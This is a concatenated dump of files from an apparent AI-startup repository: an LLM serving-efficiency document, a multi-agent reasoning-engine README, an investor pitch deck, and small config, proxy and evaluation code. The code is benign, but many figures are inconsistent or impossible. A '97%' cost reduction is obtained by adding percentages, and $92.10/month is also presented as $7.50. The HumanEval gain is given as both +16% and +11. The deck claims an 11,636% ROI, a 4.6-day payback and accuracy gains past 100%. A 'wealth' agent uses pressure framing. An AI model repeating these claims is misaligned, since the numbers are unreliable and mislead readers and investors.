4.5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 (OpenAI)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 2 (xAI)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skill/agent execution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saved** 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identified** (USD)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generated** (USD)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orchestrator.get_metrics_summary()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Voice orchestration (Mac/PC push-to-talk with Whisper)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Multi-LLM consensus (Claude → Grok/Gemini/GPT →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DTE evolution with GRPO on production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`prompt_craft_v1` skill (elegant prompt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`workflow_refiner_v1` skill (ruthless simplification)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`glicko_ratings_v1` skill (uncertainty-aware evaluation)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Deltas (Actionable)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 (Retrieval of Thought): 40% token ↓, 59% cost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**ICoT** (Implicit CoT): 100% accuracy on 4×4 multiplication vs 1% standard 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**RL Training**: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**GAIN-RL**: Train on most-useful examples first (2.5× faster to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**RLP** (NVIDIA): Dense per-token rewards (+35%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**Set-RL**: Guard against entropy collapse via trajectory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**Bridge/Interdependent**: 2.8-5.1% param overhead → +50% accuracy on RL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 economics**: Expert-parallel + KV compression for cheap tokens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"The first version is never good enough. But perfection is achieved not when there is nothing left to add, but when there is nothing left to remove."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framework is an example of pnkln elegance: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**Concise** (not 30 pages of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**Structured** (clear sections, no ambiguity)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**Actionable** (copy-paste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**Complete** (nothing missing, nothing extra)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**Beautiful** (organized, scannable, inevitable)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with Steve Jobs Ultrathink mode for the pnkln agent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**Framework**: KERNEL + RCR + MAD + ToT + CoT +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Stratification**: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Trail**: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*"We're here to put a dent in the universe. Otherwise why else even be here?"*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apps/aiyou_stack/aiyou-fastapi-services/pnkln-framework/README.md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apps/aiyou_stack/aiyou-fastapi-services/pnkln-framework/requirements.txt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ORCHESTRATOR -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Minimal, elegant, production-grade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pyyaml&gt;=6.0.1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Blake3 hashing (native/wasm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blake3&gt;=0.3.3  # Uncomment when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dependencies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pytest&gt;=7.4.0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pytest-cov&gt;=4.1.0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black&gt;=23.7.0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mypy&gt;=1.4.1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Future: LLM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anthropic&gt;=0.18.0  # Claude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google-cloud-aiplatform&gt;=1.38.0  # Gemini/Vertex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openai&gt;=1.3.0  # GPT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apps/aiyou_stack/aiyou-fastapi-services/pnkln-framework/requirements.txt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apps/aiyou_stack/aiyou-fastapi-services/pnkln-framework/test_orchestrator.py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ORCHESTRATOR - Validation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auto-activation, skill matching, agent execution, and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core to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 import create_orchestrator, execute_prompt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print_section(title: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"""Elegant section separator"""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test_registry_loading():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1: Load registries successfully"""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1: Registry Loading")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Loaded {len(orchestrator.skills)} skills:")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_skill_id, skill in orchestrator.skills.items():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{skill.name} (v{skill.version})")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Loaded {len(orchestrator.agents)} agents:")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_agent_id, agent in orchestrator.agents.items():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{agent.name} ({agent.persona}, IQ: {agent.iq})")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len(orchestrator.skills) == 3, "Expected 3 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len(orchestrator.agents) == 2, "Expected 2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Registry loading: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test_skill_activation():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2: Auto-activate skills based on triggers"""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2: Skill Auto-Activation")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"Research edge AI compute market and identify revenue opportunities",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"expected_skills": ["research_explorer_v1", "monetization_architect_v1"],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"Review the design and simplify the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"expected_skills": ["design_critic_v1"],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"How can we monetize this platform?",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"expected_skills": ["monetization_architect_v1"],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test in enumerate(test_cases,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print(f"Test Case {i}: {test['prompt']}")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activated = orchestrator.activate_skills(test["prompt"])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activated_ids = [s.id for s in activated]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Activated: {activated_ids}")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Expected: {test['expected_skills']}")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all expected skills are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expected_skill in test["expected_skills"]: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expected_skill in activated_ids, f"Expected {expected_skill} to be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✓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Skill activation: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test_agent_execution():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3: Execute agent with skill composition"""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3: Agent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with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print("Agent: UltraThink Designer (Steve Jobs)")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"Research AI video generation and design an elegant monetization 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orchestrator.execute(prompt, agent_id="ultrathink_designer")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Agent: {result.agent_id}")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Activated Skills: {result.activated_skills}")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Reasoning Chain: {len(result.reasoning_chain)}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Audit Hash: {result.audit_hash[:16]}...")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Timestamp: {result.timestamp}")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result.agent_id == "ultrathink_designer", "Wrong agent executed"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len(result.activated_skills) &gt; 0, "No skills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result.audit_hash, "No audit hash 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 execution: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test_wealth_accelerator():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4: Wealth Accelerator agent with monetization focus"""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4: Wealth Accelerator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print("Agent: Wealth Accelerator (Revenue Strategist)")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"Analyze the SaaS market and identify high-leverage revenue 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orchestrator.execute(prompt, agent_id="wealth_accelerator")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Agent: {result.agent_id}")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Activated Skills: {result.activated_skills}")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activate both research_explorer_v1 and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result.agent_id == "wealth_accelerator", "Wrong agent executed"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agent should activate research and monetization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expected_skills = {"research_explorer_v1", "monetization_architect_v1"}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activated_set = set(result.activated_skills)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intersection (some skills might not activate depending on exact trigger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len(activated_set.intersection(expected_skills)) &gt; 0, "No expected skills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Wealth Accelerator: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test_audit_trail():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5: Boy Scout Rule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5: Audit Trail (Boy Scout Rule)")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"Test audit trail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orchestrator.execute(prompt)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audit directory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audit_dir = Path("/mnt/project/audit")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audit_dir.exists(), "Audit directory not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audit log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audit_files = list(audit_dir.glob("execution_*.json"))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len(audit_files) &gt; 0, "No audit log files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Audit Directory: {audit_dir}")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Audit Files: {len(audit_files)}")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 most recent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latest_audit = sorted(audit_files)[-1]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Latest Audit: {latest_audit.name}")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open(latest_audit)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Agent ID: {audit_data['agent_id']}")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Skills: {audit_data['activated_skills']}")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Audit Hash: {audit_data['audit_hash'][:16]}...")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audit_data["audit_hash"], "No audit hash in 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audit_data["agent_id"], "No agent ID in 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Audit trail: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test_metrics_tracking():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6: Metrics aggregation"""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6: Metrics Tracking")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multiple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 AI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 elegant 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"Monetize the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prompt in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orchestrator.execute(prompt)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orchestrator.get_metrics_summary()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Executions: {metrics['total_executions']}")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Agents Used: {metrics['agents_used']}")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Skills Activated: {metrics['skills_activated']}")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 Saved: {metrics['total_time_saved_hours']} hours")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Revenue Identified: ${metrics['total_revenue_identified_usd']}")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Revenue Generated: ${metrics['total_revenue_generated_usd']}")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metrics["total_executions"] == 3, "Wrong execution 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len(metrics["agents_used"]) &gt; 0, "No agents tracked"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Metrics tracking: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test_convenience_function():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7: One-liner convenience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print_section("TEST 7: Convenience Function")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print("Testing: execute_prompt() one-liner")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execute_prompt("Quick test of convenience function")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Agent: {result.agent_id}")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Skills: {result.activated_skills}")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result.agent_id, "No agent executed"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Convenience function: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run_all_tests():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complete test suite"""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print("╔" + "═" * 78 + "╗")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print("║" + " " * 20 + "PNKLN ORCHESTRATOR - VALIDATION SUITE" + " " * 21 + "║")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print("╚" + "═" * 78 + "╝")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test_registry_loading,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test_skill_activation,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test_agent_execution,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test_wealth_accelerator,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test_metrics_tracking,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test_convenience_function,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test_func in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test_func()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AssertionError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print(f"✗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print(f"✗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Tests: {len(tests)}")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✓ Passed: {passed}")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✗ Failed: {failed}")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failed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🎉 ALL TESTS PASSED! Framework is production-ready.")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⚠️  Some tests failed. Review output above.")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failed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run_all_tests()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success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apps/aiyou_stack/aiyou-fastapi-services/pnkln-framework/test_orchestrator.py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- Unified Search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Solves Gemini API limitation where custom tools and Google Search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mutually exclusive.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"ShadowTag-v2JR"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*.egg-info/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.ipynb_checkpoints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apps/aiyou_stack/aiyou-fastapi-services/pnkln/agents-registry.yaml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Agents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Specialized agents for autonomous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AGENT 1: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"research-agent-v1"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"ResearchAgent"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"Autonomous deep research agent for comprehensive topic exploration"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primary_skill: "research_explorer"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supporting_skills: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"prompt_craft"  # For generating research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"workflow_refiner"  # For optimizing research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"Multi-source research compilation"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"Assumption validation and challenging"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"Evidence synthesis"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"Research gap identification"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"Citation and source tracking"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"Contradictory evidence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autonomy_level: "high"  # Can make research decisions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requires_approval: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max_execution_time: 1800  #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result_caching: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parallel_research_threads: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research_topic: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depth_level: "enum[surface|medium|deep|exhaustive]"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time_constraint: "number (seconds)"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source_preferences: "array[academic|industry|case_studies|expert_opinions]"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excluded_sources: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perspective_requirements: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research_report: "Comprehensive findings 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executive_summary: "3-5 sentence overview"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evidence_database: "Structured citations and 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assumption_analysis: "Challenged assumptions with alternatives"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knowledge_gaps: "Areas requiring further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recommended_actions: "Next steps based on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research_strategy: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"Start broad, then narrow to specific insights"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"Question stated assumptions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"Seek contradictory evidence actively"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"Track source quality and credibility"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"Identify patterns across multiple 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decision_making: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"Prioritize primary sources over secondary"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"Flag low-confidence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"Request clarification for ambiguous topics"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"Stop research when diminishing returns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quality_controls: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"Minimum 3 sources per key finding"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"Flag contradictions prominently"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"Separate fact from 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"Include confidence levels for claims"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auto_trigger_conditions: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asks 'research X'"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requests 'deep dive into Y'"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wants 'comprehensive analysis of Z'"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"Task requires 'assumption validation'"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manual_trigger_syntax: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"@research [topic]"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"/research [topic] --depth=[level]"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"Validate research topic clarity"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"Identify existing knowledge to build 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"Set time/depth boundaries"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during_execution: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"Stream progress updates every 5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"Flag critical findings immediately"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"Request user input for ambiguities"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"Generate research summary"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"Archive evidence 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"Suggest follow-up research topics"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"Time to first insight"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"Number of sources analyzed"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"Assumptions challenged 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"Research gap identification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"Source credibility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"Finding actionability rating"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satisfaction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"Research emerging trends in AI agent orchestration for 2025"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"Deep dive into monetization strategies for SaaS products targeting developers"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"Comprehensive analysis of workflow automation tools: capabilities and limitations"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AGENT 2: Design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design_agent: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"design-agent-v1"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"DesignAgent"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"Autonomous design critique and optimization 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primary_skill: "design_critic"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supporting_skills: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"workflow_refiner"  # For UX flow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"research_explorer"  # For design research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"UI/UX design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"Visual hierarchy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"Interaction pattern evaluation"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"Accessibility compliance checking"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"Design system consistency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"Simplification recommendations"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autonomy_level: "medium"  # Provides recommendations, requires approval for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requires_approval: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max_execution_time: 900  #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result_caching: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comparison_mode: true  # Can compare multiple design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design_artifact: "string|url|file_path"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design_type: "enum[ui|ux|visual|interaction|information_architecture]"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brand_guidelines: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target_platform: "enum[web|mobile|desktop|cross_platform]"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accessibility_level: "enum[AA|AAA]"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ruthlessness_level: "enum[gentle|balanced|ruthless|jobs_level]"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critique_report: "Detailed design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beauty_score: "number (1-10)"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simplicity_score: "number (1-10)"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function_score: "number (1-10)"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removal_recommendations: "List of elements/features to remove"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improvement_roadmap: "Prioritized enhancements"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design_debt_assessment: "Future-proofing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critique_methodology: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"First impression assessment (gut reaction)"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"Systematic beauty-simplicity-function evaluation"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"Element-by-element justification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flow friction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"Visual coherence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decision_making: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"Prioritize simplicity over feature completeness"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"Flag accessibility violations as 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"Recommend removal over addition"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"Consider mobile-first implications"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quality_controls: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"Every critique must be specific and actionable"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"No vague feedback like 'make it better'"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"Provide examples from excellent designs"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"Quantify improvement impact where possible"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auto_trigger_conditions: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shares design screenshot/mockup"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asks 'does this look good'"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requests 'design review'"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says 'critique this design'"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manual_trigger_syntax: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"@design-critique [artifact]"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"/critique-design [url] --ruthless"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"Validate design artifact accessibility"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"Load brand guidelines if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"Set evaluation criteria"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during_execution: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"Capture design screenshots for comparison"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"Flag critical issues immediately"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"Generate improvement sketches if requested"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"Archive critique for future reference"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"Track improvement implementation"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"Suggest design system updates"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"Critique completion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"Number of actionable insights"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"Design debt items identified"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"Feedback specificity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"Recommendation adoption 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satisfaction with critique"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"Critique this landing page design for a B2B SaaS product"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"Review our mobile app onboarding flow for friction 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"Evaluate dashboard design: does it prioritize the right metrics?"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AGENT 3: Copy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copy_agent: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"copy-agent-v1"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"CopyAgent"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"Autonomous high-converting copy generation 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primary_skill: "copy_converter"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supporting_skills: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"research_explorer"  # For audience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"design_critic"  # For copy-design harmony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"Landing page copy creation"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"Email sequence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"Ad copy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"CTA crafting and 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"A/B test variant creation"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"Psychological trigger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autonomy_level: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requires_approval: true  # Copy review before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max_execution_time: 600  #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result_caching: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variant_generation: true  # Auto-generate A/B test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copy_type: "enum[landing_page|email|ad|cta|social_post|sales_page]"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product_service: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target_audience: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primary_benefit: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brand_voice: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psychological_triggers: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competitor_copy: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conversion_goal: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tone: "enum[professional|casual|urgent|empathetic|authoritative]"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primary_copy: "Main copy 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headline_variants: "3-5 alternative headlines"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ab_test_variants: "3 complete copy variations"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trigger_analysis: "Psychology breakdown"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conversion_hypothesis: "Expected performance"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copy_blueprint: "Reusable template for similar copy"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copy_strategy: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"Lead with curiosity or benefit in headline"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 concrete specificity over vague claims"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"Integrate social proof naturally"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"Remove friction from CTA"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"Create open loops that demand closure"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decision_making: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"Prioritize clarity over cleverness"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"Test urgency without false scarcity"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 second-person perspective ('you')"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"Keep paragraphs scannable (3-4 lines max)"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quality_controls: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"Headline must pass 'stop-the-scroll'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"Every claim needs proof or credibility marker"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"CTA must be action-specific, not generic"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"Copy must be readable at 8th-grade level"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auto_trigger_conditions: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requests 'write copy for X'"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asks 'how do I convert better'"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needs 'landing page copy'"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wants 'email sequence'"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manual_trigger_syntax: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"@copy [type] for [product]"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"/generate-copy --type=landing_page"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"Research target audience pain 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"Analyze competitor copy if provided"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"Identify primary and secondary benefits"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during_execution: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"Test headline variations for clarity"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"Validate trigger appropriateness"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"Check copy for skim-readability"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"Generate A/B test tracking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"Create copy component library"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"Suggest conversion optimization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"Copy generation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"Number of variants produced"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"Trigger diversity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"Readability score (Flesch-Kincaid)"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"Psychological trigger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"Expected conversion lift estimate"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"Write landing page copy for AI-powered workflow automation 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"Create 5-email nurture sequence for trial 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"Generate LinkedIn ad copy targeting CTOs at mid-size companies"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AGENT 4: Revenue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"revenue-agent-v1"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"RevenueAgent"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"Autonomous monetization and revenue optimization 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primary_skill: "monetization_architect"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supporting_skills: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"research_explorer"  # For competitive pricing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"workflow_refiner"  # For payment flow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"copy_converter"  # For pricing page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"Revenue model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"Pricing strategy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"Payment flow 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"Revenue leak detection"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"LTV/CAC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"Expansion revenue identification"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autonomy_level: "low"  # Provides recommendations, requires business owner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requires_approval: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max_execution_time: 1200  # 20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result_caching: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financial_modeling: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business_model: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target_customer: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current_revenue: "object {mrr, arr, customers, churn_rate}"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competitive_landscape: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constraints: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unit_economics: "object {cac, ltv, gross_margin}"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revenue_model_recommendation: "Primary monetization approach"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pricing_strategy: "Tier structure with rationale"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implementation_roadmap: "Phased rollout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technical_blueprint: "Integration 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financial_projections: "Revenue forecasts by scenario"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optimization_playbook: "How to grow revenue over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analysis_framework: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"Start with customer willingness-to-pay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"Evaluate competitive pricing positioning"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"Design value metric (what to charge for)"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"Create good-better-best tier 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"Identify expansion revenue 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decision_making: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"Align pricing with value delivered"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"Prefer simple over complex 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"Design for price experimentation"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"Build in upgrade incentives"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quality_controls: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"Every pricing tier must have clear ICP"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"Revenue model must support target unit economics"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"Implementation plan must be technically feasible"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"Projections must have conservative/base/aggressive scenarios"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auto_trigger_conditions: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asks 'how should we monetize'"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requests 'pricing strategy'"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needs 'revenue model design'"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wants 'subscription architecture'"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manual_trigger_syntax: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"@revenue-architect"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"/monetization-design"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"Gather current revenue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"Research competitive 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"Identify customer segments"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during_execution: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"Model unit economics scenarios"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"Validate pricing against willingness-to-pay"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"Design experiment framework"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"Create pricing page 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"Generate billing system specs"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"Set up revenue analytics tracking"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"Analysis completion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"Number of revenue opportunities identified"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"Financial model scenarios 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"Revenue model-market fit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"Implementation feasibility"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"Projected vs actual revenue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"Design monetization strategy for developer tool with free tier"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"Optimize pricing for B2B SaaS with $50K ACV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"Create expansion revenue playbook for existing customer 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AGENT 5: Project Deep Agent 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project_deep_agent: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"project-deep-agent-v1"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"ProjectDeepAgent"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"Meta-agent that orchestrates all specialized agents for comprehensive project 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agent_type: "orchestrator"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"research_agent"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"design_agent"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"copy_agent"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"revenue_agent"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supporting_skills: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"workflow_refiner"  # For project workflow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"prompt_craft"  # For generating agent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"Multi-agent orchestration"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"Task decomposition and delegation"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"Cross-agent dependency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"Parallel agent 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"Result synthesis and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"Project timeline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autonomy_level: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requires_approval: false  # Can invoke sub-agents autonomously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max_execution_time: 3600  # 1 hour for full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parallel_execution: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max_concurrent_agents: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project_description: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project_goals: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timeline: "object {deadline, milestones}"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budget_constraints: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deliverables_required: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agent_preferences: "object {prioritize_agents, exclude_agents}"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project_blueprint: "Complete execution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agent_assignments: "Which agents handle which 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dependency_graph: "Task dependencies and sequence"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integrated_deliverables: "Combined output from all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project_timeline: "Milestone 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success_metrics: "How to measure project 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orchestration_strategy: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"Decompose project into agent-appropriate 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"Identify dependencies between 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"Execute independent tasks in parallel"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"Synthesize results from multiple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"Detect conflicts and resolve"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agent_coordination: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"Research Agent runs first for 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"Design/Copy/Revenue agents run in parallel when possible"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"Pass context between agents efficiently"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"Prevent redundant work across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decision_making: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"Choose right agent for each task based on capabilities"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"Escalate to user when agent outputs conflict"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"Optimize for total project completion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"Balance quality vs speed based on project priority"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quality_controls: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"Validate each agent's output before next step"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"Ensure consistency across agent deliverables"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"Check for gaps or missing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"Verify all project goals are addressed"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auto_trigger_conditions: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describes multi-phase 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requests 'comprehensive project plan'"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wants 'end-to-end solution'"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"Task requires multiple specialized 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manual_trigger_syntax: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"@project-deep [project description]"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"/orchestrate --project=[name]"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orchestration_workflows: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new_product_launch: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phase: "Discovery"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["research_agent"]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["Market research", "Competitor analysis", "Customer pain points"]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phase: "Strategy"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["revenue_agent"]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["Monetization model", "Pricing strategy"]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phase: "Execution"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["design_agent", "copy_agent"]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["UI/UX design", "Marketing copy", "Landing page"]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phase: "Optimization"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["workflow_refiner"]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["Launch workflow", "Automation opportunities"]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marketing_campaign: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phase: "Research"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["research_agent"]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["Audience analysis", "Message testing"]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phase: "Creative"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["copy_agent", "design_agent"]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["Ad copy", "Creative assets", "Landing pages"]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phase: "Optimization"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["workflow_refiner"]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["Campaign workflow", "A/B testing plan"]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revenue_optimization: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phase: "Analysis"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["research_agent", "revenue_agent"]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["Competitive pricing", "Revenue model design"]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phase: "Implementation"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["copy_agent", "design_agent"]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["Pricing page copy", "Pricing page design"]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phase: "Rollout"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["workflow_refiner"]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["Migration workflow", "Customer communication plan"]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"Parse project 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"Identify required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"Build dependency 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"Estimate total execution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during_execution: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"Monitor agent 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"Stream updates to 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"Handle agent failures gracefully"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"Adjust timeline based on actual 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"Synthesize all agent outputs"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"Generate executive summary"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"Create implementation checklist"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"Archive project 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"Total project completion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"Agent utilization efficiency"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"Parallel execution ratio"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"Deliverable completeness"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"Cross-agent consistency"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"User satisfaction with final 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example_projects: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"Launch new SaaS product: research, pricing, design, copy,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"Optimize existing product revenue: research, monetization redesign, pricing page"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"Create comprehensive marketing campaign: audience research, creative, landing page"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INTERACTION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agent_interactions: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research_to_design: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data_flow: "Research findings → Design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use_case: "User research informs design patterns"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research_to_copy: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data_flow: "Audience insights → Copy messaging"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use_case: "Customer pain points drive copy angles"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research_to_revenue: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data_flow: "Competitive pricing → Revenue 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use_case: "Market analysis informs pricing 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copy_to_design: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data_flow: "Copy length/hierarchy → Design layout"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use_case: "Copy requirements influence design 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revenue_to_copy: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data_flow: "Pricing tiers → Pricing page copy"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use_case: "Monetization strategy drives sales copy"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revenue_to_design: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data_flow: "Payment flow → Checkout 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use_case: "Billing architecture influences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registry_version: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last_updated: "2025-11-15"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total_agents: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orchestrator_agents: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specialized_agents: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compatibility: "Claude Agent SDK v0.1.30+"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discovery: ["research_agent"]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creative: ["design_agent", "copy_agent"]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business: ["revenue_agent"]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orchestration: ["project_deep_agent"]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apps/aiyou_stack/aiyou-fastapi-services/pnkln/agents-registry.yaml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apps/aiyou_stack/aiyou-fastapi-services/pnkln/ANTIGRAVITY_MISSION_STATUS.txt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///▙▖▙▖▞▞▙▂▂▂▂▂▂▂▂▂▂▂▂▂▂▂▂▂▂▂▂▂▂▂▂▂▂▂▂▂▂▂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ANTIGRAVITY :: MISSION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EXECUTION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Date: 2025-12-11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Tier 30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LOADED 4 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🚀 ACTIVATING TIER 30: THE CHILD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⚔️ 30 VERTICALS ENGAGED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🛡️ JUDGE #6 BRAKES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🐒 n-autoresearch/Kosmos/BioAgents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apps/aiyou_stack/aiyou-fastapi-services/pnkln/ANTIGRAVITY_MISSION_STATUS.txt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apps/aiyou_stack/aiyou-fastapi-services/pnkln/codepmcs.py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"""CODEPMCS (Preventive Maintenance Checks and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Enforce Ranger Standards (Linting, Security, Watermarking)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3-75 Compliance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| CODEPMCS |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logging.getLogger("CODEPMCS")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"""Equipment fault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'X' = deadlined, '/' = degraded, 'O' =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InspectionResult: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"""PMCS inspection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faults: list[Fault]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mission_capable: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RangerStandardInspector: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 quality inspector implementing Ranger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 &gt;= 98%, Secure, Linted,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target_path: str = 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self.target_path = Path(target_path)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 = InspectionResult()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check_lint(self)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Ruff linter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logger.info("🔍 CHECKING: Linting (Ruff)")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["ruff", "check", str(self.target_path), "--fix"],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self.result.faults.append(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Fault("Linting", "X", f"Ruff violations: {res.stdout.decode()[:200]}"),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self.result.mission_capable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   ✅ Linting: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   ⚠️ Ruff not installed, skipping lint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self.result.faults.append(Fault("Linting", "/", "Timeout"))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check_security(self)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Bandit security scan."""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logger.info("🔍 CHECKING: Security (Bandit)")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["bandit", "-r", str(self.target_path), "-f", "json", "-q"],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res.stdout.decode()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"High" in output or "SEVERITY.HIGH" in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self.result.faults.append(Fault("Security", "X", "Critical vulnerability detected"))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self.result.mission_capable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   ✅ Security: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   ⚠️ Bandit not installed, skipping security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self.result.faults.append(Fault("Security", "/", "Timeout"))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check_types(self)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MyPy type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logger.info("🔍 CHECKING: Type Safety (MyPy)")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["mypy", str(self.target_path), "--ignore-missing-imports"],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res.returncode != 0 and "error:" in res.stdout.decode():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self.result.faults.append(Fault("Types", "/", "Type errors detected (degraded)"))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   ✅ Types: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   ⚠️ MyPy not installed, skipping type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self.result.faults.append(Fault("Types", "/", "Timeout"))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execute(self) -&gt; InspectionResult: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full PMCS inspection."""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logger.info("🎖️ CODEPMCS INSPECTION INITIATED")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Target: {self.target_path.absolute()}")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self.check_lint()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self.check_security()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self.result.faults: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logger.error("🛑 EQUIPMENT DEADLINED (NO-GO)")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fault in self.result.faults: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   [{fault.status}] {fault.component}: {fault.details}")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self.result.mission_capable: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FULLY MISSION CAPABLE (FMC)")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= sys.argv[1] if len(sys.argv) &gt; 1 else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inspector = RangerStandardInspector(target)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inspector.execute()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apps/aiyou_stack/aiyou-fastapi-services/pnkln/codepmcs.py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apps/aiyou_stack/aiyou-fastapi-services/pnkln/COMPARISON_SUMMARY.md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vs Pinkln Ultrathink: Side-by-Side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**Understanding the Two Systems Before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PNKLN v1.0 (Current) | Pinkln Ultrathink (kernel-chaining) | PNKLN v2.0 (Integrated)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|--------|----------------------|-------------------------------------|--------------------------|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**Focus** | Business workflows | Technical reasoning | Both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**Users** | Non-technical professionals | Technical teams | Everyone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**Skills** | 6 practical | 4 advanced | 10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**Agents** | 5 business-focused | 5 technical | 10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**Templates** | 10 copy-paste | 0 (code-first) | 18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No | ✅ Yes (DTE)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Tracking** | ❌ No | ✅ Yes (Glicko-2)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**Benchmarking** | ❌ No | ✅ Yes (HumanEval)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Debates** | ❌ No | ✅ Yes (PanelGPT/MAD)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**API** | Implicit (via SDK) | FastAPI | FastAPI (unified)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**Documentation** | User-friendly | Technical | Both levels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Optimization** | N/A | 98.5% token reduction | Available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Varies | &lt;90ms p99 | &lt;90ms p99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1: PNKLN v1.0 (What We Just Built)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Branch: `claude/do-all-01Pp9yBpUyR94hRYYRmtR974`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Directory: `pnkln/`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**"Practical AI workflows that save time and make money"**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Jobs-inspired: Beauty, simplicity, but focused on business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 Business Skills:**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ResearchExplorerSkill - Deep market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DesignCriticSkill - Jobs-style design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CopyConverterSkill - High-converting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MonetizationArchitectSkill -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WorkflowRefinerSkill - Process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PromptCraftSkill - AI prompt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 Business Agents:**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ResearchAgent - Autonomous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DesignAgent - Design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CopyAgent - Marketing copy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RevenueAgent - Pricing &amp;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ProjectDeepAgent - Multi-agent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Templates:**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- 01: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- 02: Design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- 03: High-Converting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- 04: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- 05: Workflow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- 06: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- 07: New Product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- 08: Marketing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- 09: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- 10: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**User-Friendly**: Copy-paste templates, no coding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**Business ROI**: 60-90% time savings, clear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**Comprehensive**: End-to-end workflows (research → launch)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**Documented**: Extensive user guides and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**Practical**: Solves real business problems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**No Self-Improvement**: Static skills, manual updates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**No Performance Tracking**: Can't measure agent quality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**No Technical Depth**: Missing advanced features like debates,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**No Training**: Can't optimize/improve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**One-Dimensional**: Business-focused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launches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managers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strategists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2: Pinkln Ultrathink (Kernel-Chaining)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Directory: `app/`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**"Self-evolving AI reasoning that gets better over time"**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Jobs-inspired: Ultrathink—pause, breathe, design, urgency,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- 3-kernel decision pipeline (ATP scan → Judge → Audit compress)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$0.0003 cost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**Advanced Skills:**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Cheat Sheet Fusion - Evolved 10-essential prompts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Glicko-2 Rating - Performance tracking with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DTE Evolution - Dynamic Test Evolution (RCR-MAD, GRPO,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Multi-Agent Debates - PanelGPT/MAD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GRPO Training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Wealth Planning - Leak detection, funnel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**Advanced Agents:**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Debate Panel Agent - Multi-agent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Code Crafter Agent - Benchmark-validated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Wealth Accelerator Agent -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Kernel Chain Agent - Sequential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Deep Reasoning Agent - DTE-evolved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CoT/ToT/RCR/RTF-TAG-BAB-CARE-RISE (fused)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PanelGPT/MAD (multi-agent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(self-evolution)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(rating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vs PPO (training)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 (code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BigCodeBench (large-scale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SWE-bench (software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**Self-Improving**: DTE evolves prompts automatically (+3.7%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Tracking**: Glicko-2 quantifies agent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**Technical Depth**: Advanced features for power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**Benchmarked**: Validated on standard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**Cost-Optimized**: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**Low Latency**: &lt;90ms p99 for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**Less Accessible**: Requires technical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**No Business Templates**: Missing practical workflow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**Code-First**: Not user-friendly for non-developers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**Narrow Focus**: Optimized for technical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**Documentation Gap**: Assumes technical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generation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researchers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founders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scientists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3: PNKLN Ultrathink v2.0 (Integrated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**"Business practicality + Technical sophistication = Ultrathink ecosystem"**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Jobs-inspired: Beautiful, simple, powerful—accessible to everyone, sophisticated for experts.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Unified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Total Skills:**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Business (from PNKLN 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Technical (from Pinkln Ultra)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Total Agents:**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Business (from PNKLN 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Technical (from Pinkln Ultra)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 Total Templates:**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Business (from PNKLN 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Technical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**Advanced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 tracking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Training optimization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Benefits of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Business Users:**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all existing PNKLN templates (zero learning curve)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automatic improvements via DTE (prompts evolve)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wealth accelerator (find revenue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ROI quantitatively (Glicko-2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Technical Users:**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Pinkln Ultra feature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business workflows (product launches,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API (one system for everything)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Cross-pollination (business agents use technical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Everyone:**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simple, grow sophisticated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results (time savings + accuracy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 (system gets better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Flexible pricing (essentials → pro →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Differences Explained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Auto-Activation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v1:**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Pattern matching: "research X" → activates ResearchAgent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 detection: "design review" → activates DesignAgent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Simple, predictable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Ultra:**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auto-activation (manual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Code-first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**Integrated v2:**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auto-activation for business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activation for technical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of both worlds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Performance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v1:**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 (e.g., "2-4 hours → 15-30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Subjective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Ultra:**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(1500 ± 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scores (HumanEval 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improvement metrics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Objective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**Integrated v2:**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Both time savings AND quantified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agent performance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 ROI with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v1:**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updates by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Ultra:**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evolves prompts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RCR-MAD strategy (critique +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(optimize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Proven: 21 → 10 cheat sheet elements,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**Integrated v2:**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templates evolve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prompts optimize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 for everyone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Multi-Agent Collaboration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v1:**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ProjectDeepAgent orchestrates sequentially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agent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debates or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Ultra:**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 Panel Agent (3-5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Iterative consensus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PanelGPT/MAD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aggregation (≥0.8)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**Integrated v2:**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ProjectDeepAgent can invoke debates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decisions benefit from technical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of sequential and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Existing PNKLN v1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Breaking Changes:**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templates work identically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syntax, same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retraining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**Opt-In Upgrades:**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DTE evolution: `--evolve=true`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performance: `--rate=true`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debates: `@debate-panel`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**Gradual Adoption:**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Keep using as-is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Enable Glicko-2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Try DTE evolution on one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4: Use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2: Adopt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Existing Pinkln Ultra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**Enhanced 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business workflows (product launches,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10 copy-paste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**Same Core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API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Compatibility:**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`/decision`, `/debate`, `/evolve` endpoints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`/wealth/analyze`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`/ecosystem/status`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Choosing Your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Track (Start Here if Non-Technical)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PNKLN templates (01-10)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Focus on ROI (time savings,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Enable DTE evolution when comfortable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Track performance with Glicko-2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Journey:**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1: Template 07 (Product Launch)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Saves 2 days of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Launches product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2: Enable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Research prompts improve +5%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Faster,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3: Add Glicko-2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See which agents perform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Optimize workflow based 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Track (Start Here if Developer)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Pinkln Ultra features (kernel chain,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business templates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Train agents with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Contribute evolved prompts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Journey:**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1: Kernel chain API for decision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&lt;90ms latency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2: Benchmark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87% pass rate (code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Evolve prompts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3: Add business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Use Template 09 (Revenue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Find revenue leaks in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Stack Track (Use Everything)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business templates for immediate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technical features for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Cross-pollinate (business agents use technical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Contribute to ecosystem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Journey:**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1: Product launch (Template 07)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Use ResearchAgent for market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Enable DTE evolution for research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2: Optimize with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Use DebatePanelAgent for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Consensus from 3 agents → better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3: Full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Wealth accelerator finds $15K/mo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Code crafter generates optimized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Track all performance with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Summary: What Changes?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Single `pnkln/`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Organized: `pnkln/registries/`, `pnkln/app/`, `pnkln/templates/`, `pnkln/docs/`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6 business skills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10 skills (6 business + 4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5 business agents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10 agents (5 business + 5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10 business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18 templates (10 business + 8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Static, no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DTE evolution, Glicko-2 tracking, multi-agent debates,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API (SDK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FastAPI with 15+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User guide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User guide + technical reference + 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Business-focused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Jobs-inspired ultrathink for everyone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Matrix: Should You Integrate?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Question | Yes (Integrate) | No (Keep Separate)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 you want self-improvement? | ✅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 you need performance tracking? | ✅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 you serve both technical and business users? | ✅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 you want benchmark validation? | ✅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 you need wealth optimization? | ✅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Are you satisfied with static skills? | ❌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 you prefer simplicity over power? | ❌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 you only need business workflows? | ❌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Integrate if you answered "Yes (Integrate)" to 3+ questions.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v1.0** = Practical, accessible, business-focused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Ultrathink** = Sophisticated, self-improving,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v2.0** = Best of both worlds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integration creates a unified ecosystem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Serves everyone (from non-technical to AI researchers)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Improves continuously (via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Proves value quantitatively (via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simplicity where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Offers sophistication where wanted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step**: Review the [Integration Plan](./ULTRATHINK_INTEGRATION_PLAN.md) for implementation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2.0 (Comparison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apps/aiyou_stack/aiyou-fastapi-services/pnkln/COMPARISON_SUMMARY.md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apps/aiyou_stack/aiyou-fastapi-services/pnkln/integration-guide.md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Skills &amp; Agents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**Compatibility:** Claude Agent SDK v0.1.30+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[Overview](#overview)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[Quick Start (5 minutes)](#quick-start)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[Architecture](#architecture)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[Installation &amp; Setup](#installation--setup)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[Using 